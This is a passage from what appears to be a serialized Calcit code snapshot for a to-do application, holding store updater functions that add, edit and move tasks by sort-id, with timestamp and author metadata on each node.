|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJ84S5q51CSW)
|r $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJvVB95ckCBW)
|v $ {} (:text |op-id) (:type :leaf) (:at 1518019723925) (:by |root) (:id |Bk_Nrcc91RSW)
|x $ {} (:text |op-time) (:type :leaf) (:at 1525887411430) (:by |root) (:id |rkg9hb2xRz)
:type :expr
:at 1500452996813
:by nil
:id |rkEVr9c5kRS-
:type :expr
:at 1500452996813
:by nil
:id |SJMNBqqq1Arb
|x $ {}
:data $ {}
|T $ {} (:text |:task/add-after) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJnmrqq9k0rW)
|j $ {}
:data $ {}
|T $ {} (:text |add-after) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H10QHccc1AHW)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJJ4Hc9ckRHb)
|r $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1lVSccq1RBZ)
|v $ {} (:text |op-id) (:type :leaf) (:at 1518019725703) (:by |root) (:id |SyZ4H55qkRrb)
|x $ {} (:text |op-time) (:type :leaf) (:at 1525887413994) (:by |root) (:id |SJxT2-2lAM)
:type :expr
:at 1500452996813
:by nil
:id |S1a7H9c9JCSb
:type :expr
:at 1500452996813
:by nil
:id |r1iQrc5cJRHb
|y $ {}
:data $ {}
|T $ {} (:text |:task/edit) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1LuB5q9yCHW)
|j $ {}
:data $ {}
|T $ {} (:text |let-sugar) (:type :leaf) (:at 1629051860471) (:by |Qr5ffqtY) (:id |rJuOB9q9JRS-)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hkh_rq95y0rb)
|j $ {} (:text |task-id) (:type :leaf) (:at 1518019372480) (:by |root) (:id |r1adr9qckAHb)
|r $ {} (:text |text) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S10dBcc5JRSZ)
:type :expr
:at 1500452996813
:by nil
:id |BkjdS5ccy0rW
|j $ {} (:text |op-data) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkJtSc5qkRBZ)
:type :expr
:at 1500452996813
:by nil
:id |B1c_S59cy0SW
:type :expr
:at 1500452996813
:by nil
:id |SJt_SqqckCS-
|r $ {}
:data $ {}
|T $ {} (:text |assoc-in) (:type :leaf) (:at 1518019402757) (:by |root) (:id |BkZFB5q5kRH-)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJfFScc9yArW)
|r $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1518019380497) (:by |root) (:id |SJ2E7jO8f)
|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rkXtH9c5yRBW)
|j $ {} (:text |task-id) (:type :leaf) (:at 1518019383151) (:by |root) (:id |Syg6E7i_LG)
|r $ {} (:text |:text) (:type :leaf) (:at 1518019395624) (:by |root) (:id |BJW9SQsOIz)
:type :expr
:at 1518019379351
:by |root
:id |H1QjEmoOUz
|v $ {} (:text |text) (:type :leaf) (:at 1518019399831) (:by |root) (:id |H1GAr7iOUf)
:type :expr
:at 1500452996813
:by nil
:id |HJetHc9ck0H-
:type :expr
:at 1500452996813
:by nil
:id |r1w_Hcq9yRBW
:type :expr
:at 1500452996813
:by nil
:id |SkS_B995JArb
:type :expr
:at 1500452996813
:by nil
:id |SkIMrccc1CBb
:type :expr
:at 1500452996813
:by nil
:id |rJRbHc5q1ABb
|move-task $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1518020813089) (:by |root) (:id |rkGBROjdLf)
|j $ {} (:text |move-task) (:type :leaf) (:at 1518020813089) (:by |root) (:id |rk7HC_juIM)
|r $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1518020815035) (:by |root) (:id |BkMIRdouUf)
|j $ {} (:text |op-data) (:type :leaf) (:at 1518020816204) (:by |root) (:id |HJEwAOo_If)
:type :expr
:at 1518020813089
:by |root
:id |ryVBC_o_LG
|v $ {}
:data $ {}
|T $ {} (:text |let-sugar) (:type :leaf) (:at 1629051944877) (:by |Qr5ffqtY) (:id |r1tAujuIMleaf)
|j $ {}
:data $ {}
|xT $ {}
:data $ {}
|T $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518021027366) (:by |root) (:id |HkeOoYo_LGleaf)
|j $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1629052268410) (:by |Qr5ffqtY) (:id |H12sKodIz)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1518021035742) (:by |root) (:id |SkW2FidUf)
|j $ {} (:text |store) (:type :leaf) (:at 1518021038383) (:by |root) (:id |BJMN3ts_8f)
:type :expr
:at 1518021033727
:by |root
:id |SJMhFo_8z
|r $ {}
:data $ {}
|T $ {} (:text |vals) (:type :leaf) (:at 1518021041570) (:by |root) (:id |SJxvntoO8f)
:type :expr
:at 1518021041768
:by |root
:id |rke92YjuLM
|v $ {}
:data $ {}
|T $ {} (:text |map) (:type :leaf) (:at 1518021045639) (:by |root) (:id |Bkg32Yo_LGleaf)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052276740) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1629052281390) (:by |Qr5ffqtY)
:type :expr
:at 1629052277235
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518021048539) (:by |root) (:id |ryWAntiOIG)
|j $ {} (:text |x) (:type :leaf) (:at 1629052279962) (:by |Qr5ffqtY)
:type :expr
:at 1629052278897
:by |Qr5ffqtY
:type :expr
:at 1629052275087
:by |Qr5ffqtY
:type :expr
:at 1518021043799
:by |root
:id |Bkg32Yo_LG
:type :expr
:at 1518021028067
:by |root
:id |B1xnjYidIM
:type :expr
:at 1518021024021
:by |root
:id |HkeOoYo_LG
|yT $ {}
:data $ {}
|T $ {} (:text |new-pointer) (:type :leaf) (:at 1518022438728) (:by |root) (:id |HJSmJh_IGleaf)
|j $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |&exclude) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|j $ {} (:text |all-sort-ids) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|j $ {} (:text |from-task) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
:type :expr
:at 1629053057543
:by |Qr5ffqtY
:type :expr
:at 1629053057543
:by |Qr5ffqtY
|n $ {}
:data $ {}
|T $ {} (:text |.to-list) (:type :leaf) (:at 1629053086540) (:by |Qr5ffqtY)
:type :expr
:at 1629053084721
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |conj) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|j $ {} (:text |new-sort-id) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
:type :expr
:at 1629053057543
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |sort) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|j $ {} (:text |&compare) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
:type :expr
:at 1629053057543
:by |Qr5ffqtY
|x $ {}
:data $ {}
|T $ {} (:text |.index-of) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
|j $ {} (:text |new-sort-id) (:type :leaf) (:at 1629053057543) (:by |Qr5ffqtY)
:type :expr
:at 1629053057543
:by |Qr5ffqtY
:type :expr
:at 1629053057543
:by |Qr5ffqtY
:type :expr
:at 1518022429030
:by |root
:id |HJSmJh_IG
|T $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518020817808) (:by |root) (:id |HkQtAdsOLG)
|j $ {} (:text |from-id) (:type :leaf) (:at 1518020824738) (:by |root) (:id |rkhCdjd8M)
|r $ {} (:text |to-id) (:type :leaf) (:at 1518020825855) (:by |root) (:id |SyZZJFj_Uz)
:type :expr
:at 1518020819326
:by |root
:id |HkmsRuoO8G
|j $ {} (:text |op-data) (:type :leaf) (:at 1518020830294) (:by |root) (:id |BygBytid8G)
:type :expr
:at 1518020817454
:by |root
:id |BkBtR_oOIM
|j $ {}
:data $ {}
|T $ {} (:text |tasks) (:type :leaf) (:at 1518020858571) (:by |root) (:id |Hybngtjd8Gleaf)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1518020861362) (:by |root) (:id |rJxQbtj_LG)
|j $ {} (:text |store) (:type :leaf) (:at 1518020862099) (:by |root) (:id |ByEB-KjOIM)
:type :expr
:at 1518020859101
:by |root
:id |SyWQbYj_Uf
:type :expr
:at 1518020852230
:by |root
:id |Hybngtjd8G
|n $ {}
:data $ {}
|T $ {} (:text |before?) (:type :leaf) (:at 1519749207595) (:by |root) (:id |HJCUuZQ_fleaf)
|j $ {}
:data $ {}
|T $ {} (:text |>) (:type :leaf) (:at 1519749328123) (:by |root) (:id |BJeevOZQ_G)
|X $ {}
:data $ {}
|D $ {} (:text |get-in) (:type :leaf) (:at 1519749305629) (:by |root) (:id |ByS3dWXOz)
|L $ {} (:text |tasks) (:type :leaf) (:at 1519749294641) (:by |root) (:id |S1LhdbXdG)
|T $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1519749307570) (:by |root) (:id |rJW7pOW7uM)
|T $ {} (:text |from-id) (:type :leaf) (:at 1519749317756) (:by |root) (:id |ryWFuWQuf)
|j $ {} (:text |:sort-id) (:type :leaf) (:at 1519749311466) (:by |root) (:id |rJZraOZQ_G)
:type :expr
:at 1519749306886
:by |root
:id |rkxm6uW7uM
:type :expr
:at 1519749292150
:by |root
:id |HJWsCd-mdG
|b $ {}
:data $ {}
|D $ {} (:text |get-in) (:type :leaf) (:at 1519749305629) (:by |root) (:id |ByS3dWXOz)
|L $ {} (:text |tasks) (:type :leaf) (:at 1519749294641) (:by |root) (:id |S1LhdbXdG)
|T $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1519749307570) (:by |root) (:id |rJW7pOW7uM)
|T $ {} (:text |to-id) (:type :leaf) (:at 1519749241217) (:by |root) (:id |ryWFuWQuf)
|j $ {} (:text |:sort-id) (:type :leaf) (:at 1519749311466) (:by |root) (:id |rJZraOZQ_G)
:type :expr
:at 1519749306886
:by |root
:id |rkxm6uW7uM
:type :expr
:at 1519749292150
:by |root
:id |Hkl4ndW7OG
:type :expr
:at 1519749209553
:by |root
:id |r1zvubXdM
:type :expr
:at 1519749205779
:by |root
:id |BkWQ3OZm_f
|r $ {}
:data $ {}
|T $ {} (:text |from-task) (:type :leaf) (:at 1518020864829) (:by |root) (:id |rygPWKoOIfleaf)
|j $ {}
:data $ {}
|T $ {} (:text |get) (:type :leaf) (:at 1518020866860) (:by |root) (:id |BJ7FbtsdLG)
|j $ {} (:text |tasks) (:type :leaf) (:at 1518020870198) (:by |root) (:id |Sk6-YouIG)
|r $ {} (:text |from-id) (:type :leaf) (:at 1518020872310) (:by |root) (:id |rkf0ZYo_Uz)
:type :expr
:at 1518020865296
:by |root
:id |r1EFbtiO8G
:type :expr
:at 1518020862902
:by |root
:id |rygPWKoOIf
|v $ {}
:data $ {}
|T $ {} (:text |to-task) (:type :leaf) (:at 1518020875093) (:by |root) (:id |ryWbfFsdLzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |get) (:type :leaf) (:at 1518020875857) (:by |root) (:id |B1zXGKjdLM)
|j $ {} (:text |tasks) (:type :leaf) (:at 1518020877263) (:by |root) (:id |r1MNMYjOLz)
|r $ {} (:text |to-id) (:type :leaf) (:at 1518020878450) (:by |root) (:id |rJ-rGKjdLz)
:type :expr
:at 1518020875443
:by |root
:id |Sy7mMtj_Lz
:type :expr
:at 1518020873245
:by |root
:id |ryWbfFsdLz
|x $ {}
:data $ {}
|T $ {} (:text |base-sort-id) (:type :leaf) (:at 1518020905448) (:by |root) (:id |HkaXKj_Izleaf)
|j $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518020908618) (:by |root) (:id |ByzEYou8z)
|j $ {} (:text |to-task) (:type :leaf) (:at 1518020909717) (:by |root) (:id |r1ZrEYsOIG)
:type :expr
:at 1518020906147
:by |root
:id |SyezVYidUz
:type :expr
:at 1518020901433
:by |root
:id |HkaXKj_Iz
|y $ {}
:data $ {}
|T $ {} (:text |new-sort-id) (:type :leaf) (:at 1518020920081) (:by |root) (:id |BJZP4Fo_Uzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1518020921261) (:by |root) (:id |rJGlrKi_IM)
|j $ {} (:text |before?) (:type :leaf) (:at 1518020928132) (:by |root) (:id |BJMbBKsO8M)
|r $ {}
:data $ {}
|D $ {} (:text |bisect) (:type :leaf) (:at 1518020974529) (:by |root) (:id |BklSuYoOUG)
|T $ {}
:data $ {}
|D $ {} (:text |or) (:type :leaf) (:at 1518020965669) (:by |root) (:id |SJbpvYsu8M)
|T $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1629052851654) (:by |Qr5ffqtY) (:id |BJgpXcyiLG)
|L $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518168617375) (:by |root) (:id |S1lZV51oLG)
|P $ {}
:data $ {}
|T $ {} (:text |.to-list) (:type :leaf) (:at 1629052897946) (:by |Qr5ffqtY)
:type :expr
:at 1629052896521
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |filter) (:type :leaf) (:at 1518020939270) (:by |root) (:id |BJmbIFsdLz)
|b $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518020948127) (:by |root) (:id |Sk58tjOIf)
|j $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1518020949431) (:by |root) (:id |HkW2UKod8z)
:type :expr
:at 1518020948925
:by |root
:id |Sy68Fju8M
|r $ {}
:data $ {}
|T $ {} (:text |<) (:type :leaf) (:at 1518020951759) (:by |root) (:id |rJZ1vKsd8fleaf)
|j $ {} (:text |x) (:type :leaf) (:at 1518020952299) (:by |root) (:id |ryglvtj_LM)
|r $ {} (:text |base-sort-id) (:type :leaf) (:at 1518020962765) (:by |root) (:id |H1GvKsd8M)
:type :expr
:at 1518020951237
:by |root
:id |rJZ1vKsd8f
:type :expr
:at 1518020946989
:by |root
:id |B1i8KjdUf
:type :expr
:at 1518020937473
:by |root
:id |ByEWIKjdUM
|j $ {}
:data $ {}
|T $ {} (:text |sort) (:type :leaf) (:at 1518168619489) (:by |root) (:id |Bkg745kjLfleaf)
|j $ {} (:text |&compare) (:type :leaf) (:at 1629052854724) (:by |Qr5ffqtY)
:type :expr
:at 1518168618769
:by |root
:id |Bkg745kjLf
|r $ {}
:data $ {}
|T $ {} (:text |last) (:type :leaf) (:at 1518168624763) (:by |root) (:id |H1xOV5yiUzleaf)
:type :expr
:at 1518168623926
:by |root
:id |H1xOV5yiUz
:type :expr
:at 1518168612701
:by |root
:id |SJb949ys8f
|j $ {} (:text |min-id) (:type :leaf) (:at 1518020968948) (:by |root) (:id |B1GRPFjuUf)
:type :expr
:at 1518020965074
:by |root
:id |SklTvYj_IG
|j $ {} (:text |base-sort-id) (:type :leaf) (:at 1518020980666) (:by |root) (:id |SJ9dYjOLG)
:type :expr
:at 1518020972529
:by |root
:id |HJBOtou8M
|v $ {}
:data $ {}
|T $ {} (:text |bisect) (:type :leaf) (:at 1518020989747) (:by |root) (:id |SymYto_Uzleaf)
|j $ {} (:text |base-sort-id) (:type :leaf) (:at 1518020996813) (:by |root) (:id |BkZLFKoOIz)
|r $ {}
:data $ {}
|D $ {} (:text |or) (:type :leaf) (:at 1518021018834) (:by |root) (:id |SJXiFj_Lf)
|T $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1629052902690) (:by |Qr5ffqtY) (:id |S1gHcksLf)
|L $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518168633426) (:by |root) (:id |HyzWr91sIG)
|P $ {}
:data $ {}
|T $ {} (:text |.to-list) (:type :leaf) (:at 1629052907060) (:by |Qr5ffqtY)
:type :expr
:at 1629052904630
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |filter) (:type :leaf) (:at 1518021001980) (:by |root) (:id |SJWcYiuLG)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518021005318) (:by |root) (:id |BkE5tid8G)
|j $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1518021006216) (:by |root) (:id |BJzrcKo_IG)
:type :expr
:at 1518021005999
:by |root
:id |SyIqFj_8f
|r $ {}
:data $ {}
|T $ {} (:text |>) (:type :leaf) (:at 1518021007460) (:by |root) (:id |BJlvqKjd8Mleaf)
|j $ {} (:text |x) (:type :leaf) (:at 1518021007992) (:by |root) (:id |r1d9YouIz)
|r $ {} (:text |base-sort-id) (:type :leaf) (:at 1518021011111) (:by |root) (:id |BkW_9Ys_Lz)
:type :expr
:at 1518021007141
:by |root
:id |BJlvqKjd8M
:type :expr
:at 1518021004561
:by |root
:id |HkB5KsdIz
:type :expr
:at 1518021000950
:by |root
:id |SygZ5ts_LM
|j $ {}
:data $ {}
|T $ {} (:text |sort) (:type :leaf) (:at 1518168635820) (:by |root) (:id |B1l7SqkjLGleaf)
|j $ {} (:text |&compare) (:type :leaf) (:at 1629052911433) (:by |Qr5ffqtY)
:type :expr
:at 1518168635242
:by |root
:id |B1l7SqkjLG
|r $ {}
:data $ {}
|T $ {} (:text |first) (:type :leaf) (:at 1518168638325) (:by |root) (:id |SJIrqyj8fleaf)
:type :expr
:at 1518168637585
:by |root
:id |SJIrqyj8f
:type :expr
:at 1518168631499
:by |root
:id |SkZdSqJiIz
|j $ {} (:text |max-id) (:type :leaf) (:at 1518021021242) (:by |root) (:id |SyQ7jFo_UG)
:type :expr
:at 1518021018275
:by |root
:id |H1WGsYo_Lf
:type :expr
:at 1518020986526
:by |root
:id |SymYto_Uz
:type :expr
:at 1518020920716
:by |root
:id |By-BFjO8z
:type :expr
:at 1518020911272
:by |root
:id |BJZP4Fo_Uz
:type :expr
:at 1518020817291
:by |root
:id |HkNt0_juLz
|r $ {}
:data $ {}
|D $ {} (:text |->) (:type :leaf) (:at 1518022515870) (:by |root) (:id |B1ou1hu8z)
|L $ {} (:text |store) (:type :leaf) (:at 1518022516713) (:by |root) (:id |rJ-3Ok2uLf)
|T $ {}
:data $ {}
|T $ {} (:text |assoc-in) (:type :leaf) (:at 1518021056225) (:by |root) (:id |ByE6FsdIMleaf)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518021080263) (:by |root) (:id |SkbaTFoOLM)
|j $ {} (:text |:tasks) (:type :leaf) (:at 1518021081131) (:by |root) (:id |SJZg1coOUM)
|r $ {} (:text |from-id) (:type :leaf) (:at 1518021086924) (:by |root) (:id |r1zk5odLz)
|v $ {} (:text |:sort-id) (:type :leaf) (:at 1518021091357) (:by |root) (:id |B1q1cs_UG)
:type :expr
:at 1518021061363
:by |root
:id |SkMaTtjOLf
|v $ {} (:text |new-sort-id) (:type :leaf) (:at 1518021100780) (:by |root) (:id |r1-g9iuIz)
:type :expr
:at 1518021051618
:by |root
:id |ByE6FsdIM
|j $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1518022520062) (:by |root) (:id |SJxyK13u8fleaf)
|j $ {} (:text |:pointer) (:type :leaf) (:at 1518022521754) (:by |root) (:id |ByXgty3dLz)
|r $ {} (:text |new-pointer) (:type :leaf) (:at 1518022524157) (:by |root) (:id |rJfzty2OLf)
:type :expr
:at 1518022519032
:by |root
:id |SJxyK13u8f
:type :expr
:at 1518022514484
:by |root
:id |ByZ5uy3d8M
:type :expr
:at 1518020816561
:by |root
:id |r1tAujuIM
:type :expr
:at 1518020813089
:by |root
:id |r1bBRdi_8z
|add-before $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJujB9c5kABW)
|j $ {} (:text |add-before) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1FoHcq91Arb)
|r $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1sjSq95JCBZ)
|j $ {} (:text |task-id) (:type :leaf) (:at 1518020002373) (:by |root) (:id |rk2sBc59JAS-)
|r $ {} (:text |op-id) (:type :leaf) (:at 1518019992520) (:by |root) (:id |Sk6sBc5qkABb)
|v $ {} (:text |op-time) (:type :leaf) (:at 1525887417201) (:by |root) (:id |SJlxp-2g0f)
:type :expr
:at 1500452996813
:by nil
:id |rJ5sS995JCS-
|v $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1518019759620) (:by |root) (:id |SJ-Pn4jdUM)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |base-task) (:type :leaf) (:at 1518019765438) (:by |root) (:id |r1-_2Eo_8G)
|j $ {}
:data $ {}
|T $ {} (:text |get-in) (:type :leaf) (:at 1518019767065) (:by |root) (:id |BJCh4odIG)
|j $ {} (:text |store) (:type :leaf) (:at 1518019769683) (:by |root) (:id |BkfJaEo_8M)
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518019770168) (:by |root) (:id |r1GMTVsOUM)
|j $ {} (:text |:tasks) (:type :leaf) (:at 1518019771006) (:by |root) (:id |ByLMpVsu8f)
|r $ {} (:text |task-id) (:type :leaf) (:at 1518019773290) (:by |root) (:id |rk4pEoOUz)
:type :expr
:at 1518019769925
:by |root
:id |By7zpEoOLG
:type :expr
:at 1518019765902
:by |root
:id |rJxAn4suLz
:type :expr
:at 1518019760187
:by |root
:id |H1XOhVi_Lz
|j $ {}
:data $ {}
|T $ {} (:text |base-sort-id) (:type :leaf) (:at 1518019779167) (:by |root) (:id |HJPp4j_8zleaf)
|j $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019781989) (:by |root) (:id |HkGsTNj_Iz)
|j $ {} (:text |base-task) (:type :leaf) (:at 1518019783682) (:by |root) (:id |rJf0TEsOIG)
:type :expr
:at 1518019779492
:by |root
:id |B1mjTVo_UM
:type :expr
:at 1518019774756
:by |root
:id |HJPp4j_8z
|r $ {}
:data $ {}
|T $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518019789911) (:by |root) (:id |H1WWRNsdUGleaf)
|j $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1629052936538) (:by |Qr5ffqtY) (:id |rk-IC4s_UM)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1518019802945) (:by |root) (:id |ryb1SouLz)
|j $ {} (:text |store) (:type :leaf) (:at 1518019803592) (:by |root) (:id |SybmkBouIM)
:type :expr
:at 1518019801548
:by |root
:id |HyfyHo_8G
|l $ {}
:data $ {}
|T $ {} (:text |.to-list) (:type :leaf) (:at 1629052940915) (:by |Qr5ffqtY)
:type :expr
:at 1629052938278
:by |Qr5ffqtY
|n $ {}
:data $ {}
|T $ {} (:text |map) (:type :leaf) (:at 1629052944490) (:by |Qr5ffqtY) (:id |SJg5lrs_LM)
|j $ {} (:text |last) (:type :leaf) (:at 1629052947034) (:by |Qr5ffqtY)
:type :expr
:at 1518019826647
:by |root
:id |BJsgSsd8f
|t $ {}
:data $ {}
|T $ {} (:text |map) (:type :leaf) (:at 1518019830099) (:by |root) (:id |H1RxHsO8Mleaf)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052949165) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1629052951030) (:by |Qr5ffqtY)
:type :expr
:at 1629052949867
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019832075) (:by |root) (:id |BkkbHouLM)
|j $ {} (:text |x) (:type :leaf) (:at 1629052952585) (:by |Qr5ffqtY)
:type :expr
:at 1629052951885
:by |Qr5ffqtY
:type :expr
:at 1629052948481
:by |Qr5ffqtY
:type :expr
:at 1518019829572
:by |root
:id |H1RxHsO8M
|w $ {}
:data $ {}
|T $ {} (:text |sort) (:type :leaf) (:at 1518019838346) (:by |root) (:id |rkLbSjO8Gleaf)
|j $ {} (:text |&compare) (:type :leaf) (:at 1629052957129) (:by |Qr5ffqtY)
:type :expr
:at 1518019837699
:by |root
:id |rkLbSjO8G
:type :expr
:at 1518019790383
:by |root
:id |r1zUREodUG
:type :expr
:at 1518019785163
:by |root
:id |H1WWRNsdUG
|v $ {}
:data $ {}
|T $ {} (:text |sort-id-before) (:type :leaf) (:at 1518020342892) (:by |root) (:id |ryxObHjdLfleaf)
|j $ {}
:data $ {}
|D $ {} (:text |last) (:type :leaf) (:at 1518020333484) (:by |root) (:id |SJbKTLs_8f)
|T $ {}
:data $ {}
|T $ {} (:text |filter) (:type :leaf) (:at 1518019864779) (:by |root) (:id |HkcGSsO8M)
|j $ {} (:text |all-sort-ids) (:type :leaf) (:at 1518019869570) (:by |root) (:id |BJfbmHj_Uf)
|r $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1629052934483) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |x) (:type :leaf) (:at 1629052934483) (:by |Qr5ffqtY)
:type :expr
:at 1629052934483
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |<) (:type :leaf) (:at 1629052934483) (:by |Qr5ffqtY)
|j $ {} (:text |x) (:type :leaf) (:at 1629052934483) (:by |Qr5ffqtY)
|r $ {} (:text |base-sort-id) (:type :leaf) (:at 1629052934483) (:by |Qr5ffqtY)
:type :expr
:at 1629052934483
:by |Qr5ffqtY
:type :expr
:at 1629052934483
:by |Qr5ffqtY
:type :expr
:at 1518019858194
:by |root
:id |B1xcGSs_UM
:type :expr
:at 1518020289222
:by |root
:id |rygY68iOLG
:type :expr
:at 1518019840095
:by |root
:id |ryxObHjdLf
|x $ {}
:data $ {}
|T $ {} (:text |new-sort-id) (:type :leaf) (:at 1518019884403) (:by |root) (:id |rJ-zNSjOLzleaf)
|j $ {}
:data $ {}
|T $ {} (:text |bisect) (:type :leaf) (:at 1518019893729) (:by |root) (:id |rJzVEriuLf)
|b $ {}
:data $ {}
|T $ {} (:text |or) (:type :leaf) (:at 1518019921977) (:by |root) (:id |Sk9UBjuUz)
|j $ {} (:text |sort-id-before) (:type :leaf) (:at 1518020344773) (:by |root) (:id |BJmc8SidLM)
|r $ {} (:text |min-id) (:type :leaf) (:at 1518020360569) (:by |root) (:id |B17TUSi_Lf)
:type :expr
:at 1518019921692
:by |root
:id |B1XzDsdIf
|j $ {} (:text |base-sort-id) (:type :leaf) (:at 1518019921140) (:by |root) (:id |rJvIHiuIf)
:type :expr
:at 1518019884675
:by |root
:id |BySErou8G
:type :expr
:at 1518019882212
:by |root
:id |rJ-zNSjOLz
|y $ {}
:data $ {}
|T $ {} (:text |new-task) (:type :leaf) (:at 1518019934843) (:by |root) (:id |rJgHPBod8fleaf)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1518019937568) (:by |root) (:id |BkQvwrouUz)
|j $ {} (:text |schema/task) (:type :leaf) (:at 1518019940023) (:by |root) (:id |ryg5DHjOIf)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1518019940682) (:by |root) (:id |H143vSjdUf)
|j $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518019941363) (:by |root) (:id |Bk-TvSi_Uf)
|j $ {} (:text |op-id) (:type :leaf) (:at 1518019945262) (:by |root) (:id |H1IpDridUM)
:type :expr
:at 1518019940897
:by |root
:id |rkz6DridLz
|r $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518019955533) (:by |root) (:id |ByWqOSsO8fleaf)
|j $ {} (:text |new-sort-id) (:type :leaf) (:at 1518019958918) (:by |root) (:id |BJghdHiO8G)
:type :expr
:at 1518019954234
:by |root
:id |ByWqOSsO8f
|v $ {}
:data $ {}
|T $ {} (:text |:created-time) (:type :leaf) (:at 1525887123152) (:by |root) (:id |S1_cx3x0Gleaf)
|j $ {} (:text |op-time) (:type :leaf) (:at 1525887123957) (:by |root) (:id |SyEj9g2l0f)
:type :expr
:at 1525887119622
:by |root
:id |S1_cx3x0G
:type :expr
:at 1518019940354
:by |root
:id |rkShDHodIz
:type :expr
:at 1518019935240
:by |root
:id |ByNDDHoO8z
:type :expr
:at 1518019933345
:by |root
:id |rJgHPBod8f
:type :expr
:at 1518019760040
:by |root
:id |S1zunVsOLM
|T $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkelIq99kArW)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJWgU5q9kCH-)
|r $ {}
:data $ {}
|T $ {} (:text |assoc-in) (:type :leaf) (:at 1518019974973) (:by |root) (:id |BJmxUqq91CrW)
|j $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1518019979037) (:by |root) (:id |HymqSs_Iz)
